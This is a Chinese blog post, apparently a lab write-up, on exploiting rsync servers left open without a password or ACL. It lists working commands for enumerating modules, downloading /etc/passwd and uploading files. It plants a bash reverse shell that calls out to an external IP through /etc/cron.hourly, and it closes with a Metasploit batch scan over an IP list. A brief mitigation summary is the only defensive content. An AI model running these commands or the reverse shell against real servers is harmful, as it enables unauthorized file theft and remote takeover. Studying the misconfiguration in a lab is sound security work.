Rsync协议

本文介绍了rsync在Linux系统中的一个安全漏洞,该漏洞允许未经授权的用户读写服务器文件,可能导致信息泄露和远程命令执行。利用过程包括nmap扫描、文件传输、写入恶意脚本并反弹shell。防范措施应确保正确配置rsync服务,避免无密码或ACL设置。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

未授权访问

漏洞简介

rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。其中rsync协议默认监听873端口,如果目标开启了rsync服务,并且没有配置ACL或访问密码,我们将可以读写目标服务器文件。

漏洞成因

由于用户配置不当,导致任何人可未授权访问rsync,上传本地文件,下载服务器文件。

漏洞危害

1、造成了严重的信息泄露

2、上传脚本后门文件,远程命令执行

漏洞利用

vulfocus环境下的靶场

rsync 工具 kail中自带

1、nmap扫描目标系统是否开放rsync服务

2、如果存在rsync服务,则利用rsync进行下载和上传。

访问目录
rsync rsync://123.58.236.76:21733/


rsync rsync://124.70.71.251:41376/

显示目录为

src             src path
读取文件
rsync rsync://123.58.236.76:21733/src/
下载任意文件
rsync rsync://123.58.236.76:21733/src/etc/passwd ./
rsync rsync://目标地址:873/目标文件 保存路径

任意文件写入
rsync -av 1.txt rsync://123.58.236.76:45264/src/
rsync -av 本地文件路径 rsync://目标地址:873/保存路径
反弹shell

1、获取信息

rsync rsync://123.58.236.76:45264/src/etc/crontab

/etc/crontab

crontab配置文件作用:限制哪些用户可以使用crontab命令;

2、创建文件

touch shell

#!/bin/bash 
/bin/bash -i >& /dev/tcp/49.235.76.210/3306 0>&1

chmod +x shell		

3、上传文件

rsync -av shell rsync://123.58.236.76:45264/src/etc/cron.hourly

4、监听端口后等待接受反弹

配合工具:https://github.com/wgpsec/fofa_viewer

#msf批量检测
msfconsole
use auxiliary/scanner/rsync/modules_list
set rhosts file:/root/ips.txt
set threads 10
run
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

初岄

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值